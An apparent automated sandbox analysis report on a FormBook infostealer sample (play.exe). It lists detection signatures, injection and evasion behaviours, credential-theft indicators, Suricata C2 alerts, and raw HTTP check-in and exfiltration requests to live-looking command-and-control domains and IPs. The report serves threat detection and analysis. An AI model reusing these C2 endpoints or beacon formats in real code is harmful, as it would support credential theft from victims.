Windows Analysis Report
play.exe

Overview

General Information

Sample name:	play.exe
Analysis ID:	1502191
MD5:	22b582f31bd1c3a4345df16db968b74c
SHA1:	0756ad4a5bb0afefb30e7fc0e581203b52ab515d
SHA256:	9c1aee7c67abdbfcafee208e0a64ab065cd336d550f1cd66fe91679e9253903a
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Multi AV Scanner detection for submitted file

Source: play.exe	ReversingLabs: Detection: 55%
Source: play.exe	Virustotal: Detection: 58%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: play.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: play.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: play.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: relog.pdbGCTL source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104144207.0000000001478000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: relog.pdb source: play.exe, 00000000.00000003.2061474082.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, aAqvujXSGNo.exe, 00000004.00000002.4104144207.0000000001478000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aAqvujXSGNo.exe, 00000004.00000000.1976786977.0000000000A9E000.00000002.00000001.01000000.00000005.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4103761428.0000000000A9E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: play.exe, 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, play.exe, 00000000.00000003.1959294394.00000000024B4000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000003.1957582944.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000002.2062190338.00000000027FE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.0000000003210000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2063650068.0000000003064000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2061751738.0000000002E77000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: play.exe, play.exe, 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, play.exe, 00000000.00000003.1959294394.00000000024B4000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000003.1957582944.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, play.exe, 00000000.00000002.2062190338.00000000027FE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, relog.exe, 00000005.00000002.4104609981.0000000003210000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000002.4104609981.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2063650068.0000000003064000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000005.00000003.2061751738.0000000002E77000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\relog.exe

Code function: 5_2_008CC700 FindFirstFileW,FindNextFileW,FindClose,

5_2_008CC700

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then xor eax, eax	5_2_008B9AA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then pop edi	5_2_008BE28E
Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then pop edi	5_2_008D2828
Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then mov ebx, 00000004h	5_2_031004E8
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4x nop then xor eax, eax	6_2_0530162F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4x nop then pop edi	6_2_052FC17A
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 4x nop then mov ebx, 00000004h	7_2_000001917363E4E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58093 -> 199.59.243.226:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58141 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58108 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58133 -> 154.23.176.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58103 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58102 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58109 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58125 -> 52.71.57.184:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58099 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58106 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58121 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58112 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58138 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58105 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58101 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58110 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58135 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58100 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58142 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58131 -> 154.23.176.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58136 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58119 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58117 -> 200.58.111.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58116 -> 200.58.111.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58134 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58107 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58124 -> 52.71.57.184:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58113 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58118 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58098 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58096 -> 3.33.244.179:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58111 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58114 -> 200.58.111.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58126 -> 45.113.201.77:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58115 -> 200.58.111.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58143 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58095 -> 3.33.244.179:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58128 -> 45.113.201.77:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58130 -> 154.23.176.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58123 -> 52.71.57.184:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58140 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58094 -> 3.33.244.179:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58097 -> 3.33.244.179:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58122 -> 52.71.57.184:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58104 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58120 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58127 -> 45.113.201.77:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58137 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58132 -> 154.23.176.197:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58129 -> 45.113.201.77:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58139 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58144 -> 188.114.96.3:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.farukugurluakdogan.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 199.59.243.226 199.59.243.226

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: DattateccomAR DattateccomAR
Source: Joe Sandbox View	ASN Name: BODIS-NJUS BODIS-NJUS
Source: Joe Sandbox View	ASN Name: NTT-LT-ASLT NTT-LT-ASLT
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /184n/?fVU8=HRzx&ZXzt1jdX=tTw8bcF9ynF7NxNhIHnuE7PiwszZpdssllgSy53HU9FeypU+H5DHpDJo8VdiQv3xpb0wKqaBA5vXWKI3ejJljZEG/7rnegNjrXxjwHY74ScRyh8HTmiatRM= HTTP/1.1Host: www.dom-2.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /qkji/?ZXzt1jdX=3hO+HyIcgB6G+8N3LN2uHekX7uSI4ghDkWDZahGxK7g3yB5CU5vB8EVkGOKlqaF5ueualLyQHKnu8Mv7Lxk5XzuYxgHzk6nkrMT1MeRjw16ajjrCjygjRTw=&fVU8=HRzx HTTP/1.1Host: www.soliro.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /dkjp/?fVU8=HRzx&ZXzt1jdX=g2307S0kJQiqPtWe9TaGLV4XrhAf17rff9mCmcpeUxXKbAyFV69cgnnV7KzKdCkqPjJMU4CDOpfM3KvXThn0JCzwXjXd5TSeD8+4iPC5x1oijKUfR6VltjM= HTTP/1.1Host: www.playdoge.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /3yei/?ZXzt1jdX=nZxM6ZbVUNvqNiLtXDfR+7LNAf7PNkUZzI4HUL3o8BmDorsgh/n2PsYU59HPtFBmSHz6AM8ZTB8ClF4C+tQS6IhxM8ffpjo9QeQxbJNt08sZUqYfX3nGFAA=&fVU8=HRzx HTTP/1.1Host: www.farukugurluakdogan.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /xz0a/?fVU8=HRzx&ZXzt1jdX=R3gP1liecH9CEWR58z6vcTu6ZE4CAT74npPRwlq9MC9LpGUhjUlt5tD2zx/yN6MyUXEHC7bzQwr/lImARbHG2FNXY0baa7q+x6BXcM5hNR/AFuKMUDCbLno= HTTP/1.1Host: www.pacoteagil.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /74hi/?ZXzt1jdX=nGINNi176Mw32GVF7tlDMHUsDN0FLET+wtq3FMVEcbrakWyJqw7BUNhsS7t1Rgl5P/JWtiTsx+SLLpCMe4oAPWkmauoeOlVhsSF1Co6Ym9oRZTWO7OX8DvA=&fVU8=HRzx HTTP/1.1Host: www.23ddv.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /ydsb/?ZXzt1jdX=5MonW/+sdj9S4Qi9EuAiwzCb3teTJ4mp2FYtUqDRNpZKZK4yIAJ/199x4+50cXOASEslm+CgFxsG9ylKFHmgriXfA832cO2sv57t9clCzJ2/NV8benXuPPs=&fVU8=HRzx HTTP/1.1Host: www.pilibit.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /7mxg/?fVU8=HRzx&ZXzt1jdX=PQHLJRKwaUPjwxhk2GYQzWR8R4DRGzyCfDD5sOvFtKjG8ZD7og/+N9qEbnENWaH4IudDgrnmQMf3V2LiiZJ44VCDghgV12m/k9bnp6b2FJp2apyWNeh51w4= HTTP/1.1Host: www.astrocloud.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /49cz/?ZXzt1jdX=jojqsqROcSZ/YEZnqnzfA751mBAelv+z1FKsCArF5g8fu/bWNXnvEEANdKHh77itbEpRc/umBoU8ELsN52AVYzrBAQ0zHIll5d6B3+Pe+PauASdNc9uZplY=&fVU8=HRzx HTTP/1.1Host: www.rantup.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /90p1/?ZXzt1jdX=MVS+namUa0UQavAdJ03s9uygERI+uY3eTsOcU3Wjrfb6xHYz5dyozzt8oos7zGJG9hFOZSWQuwu+QIVHqyXNg2+Ky1HzvorxqHxW6JBLA1lJwD0Ad7NFYWY=&fVU8=HRzx HTTP/1.1Host: www.sssqqq07-22.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /qer4/?ZXzt1jdX=UQTe8T+Iiqz9DT0FlyqPvcGPqOgPe8+u3s7KU5oKxN2bJ9UfIOk7myDXpD+ZujeoMjeiGDcwHIyYgzCoICrrm0QdeA2m/FQRgN8WzYZXzVLDjgJaJykIP/c=&fVU8=HRzx HTTP/1.1Host: www.shipincheshi.skinAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /byvv/?fVU8=HRzx&ZXzt1jdX=tE8Yf8WYynwECT0ucMl0wg/uU5lgFM4d0lH0abgHpBN2sUJXXfRRiqZbMUuokEJXmaYUQiqZbA9PoCScD7vXiY1sERFkkaBh5gb6EBRxs5CGi9vgIcMFHkg= HTTP/1.1Host: www.ablackwomansmarch.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Source: global traffic	HTTP traffic detected: GET /vod9/?ZXzt1jdX=ivZzxM4Jfmd0ai63Imd0RTeSPfjP5G+FujZTnvobDNePA17XvJlKosOwY30TiI8/8bBp7iesbvq7jnISR7nTIeFXysPRp6fhppRWXfcEPYVY19hX8MgB2Jw=&fVU8=HRzx HTTP/1.1Host: www.kiristyle.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1

Source: global traffic	DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: www.dom-2.online
Source: global traffic	DNS traffic detected: DNS query: www.soliro.life
Source: global traffic	DNS traffic detected: DNS query: www.playdoge.buzz
Source: global traffic	DNS traffic detected: DNS query: www.farukugurluakdogan.xyz
Source: global traffic	DNS traffic detected: DNS query: www.pacoteagil.shop
Source: global traffic	DNS traffic detected: DNS query: www.pelus-pijama-pro.shop
Source: global traffic	DNS traffic detected: DNS query: www.23ddv.top
Source: global traffic	DNS traffic detected: DNS query: www.pilibit.site
Source: global traffic	DNS traffic detected: DNS query: www.astrocloud.shop
Source: global traffic	DNS traffic detected: DNS query: www.rantup.com
Source: global traffic	DNS traffic detected: DNS query: www.sssqqq07-22.fun
Source: global traffic	DNS traffic detected: DNS query: www.shipincheshi.skin
Source: global traffic	DNS traffic detected: DNS query: www.ablackwomansmarch.info
Source: global traffic	DNS traffic detected: DNS query: www.kiristyle.shop
Source: global traffic	DNS traffic detected: DNS query: www.x0x9x8x8x7x6.shop

Source: unknown

HTTP traffic detected: POST /qkji/ HTTP/1.1Host: www.soliro.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 205Cache-Control: no-cacheOrigin: http://www.soliro.lifeReferer: http://www.soliro.life/qkji/User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1Data Raw: 5a 58 7a 74 31 6a 64 58 3d 36 6a 6d 65 45 48 38 59 69 52 2f 36 77 59 64 45 4a 37 6a 78 48 4f 39 75 38 59 47 44 73 55 77 52 6e 46 7a 5a 4f 56 54 4e 4e 49 63 46 74 44 70 62 57 35 4c 62 72 33 56 37 45 62 71 6a 6b 70 74 4a 37 4d 75 49 39 70 36 6e 52 34 72 32 6e 4d 48 6b 4f 7a 51 6b 54 58 61 37 35 42 50 6d 70 63 6e 71 75 75 58 47 52 75 49 68 36 48 58 59 2b 42 4c 51 2f 42 31 6e 57 68 73 35 38 2b 36 45 37 6a 4c 78 34 57 48 77 6c 78 47 49 7a 38 39 32 33 71 73 4b 58 2f 53 7a 79 47 46 37 70 54 58 47 6f 56 72 4a 75 53 61 56 71 57 45 2b 63 79 6f 6b 35 62 66 79 68 45 52 57 77 6e 31 2f 72 61 38 73 57 63 71 39 30 41 3d 3d Data Ascii: ZXzt1jdX=6jmeEH8YiR/6wYdEJ7jxHO9u8YGDsUwRnFzZOVTNNIcFtDpbW5Lbr3V7EbqjkptJ7MuI9p6nR4r2nMHkOzQkTXa75BPmpcnquuXGRuIh6HXY+BLQ/B1nWhs58+6E7jLx4WHwlxGIz8923qsKX/SzyGF7pTXGoVrJuSaVqWE+cyok5bfyhERWwn1/ra8sWcq90A==

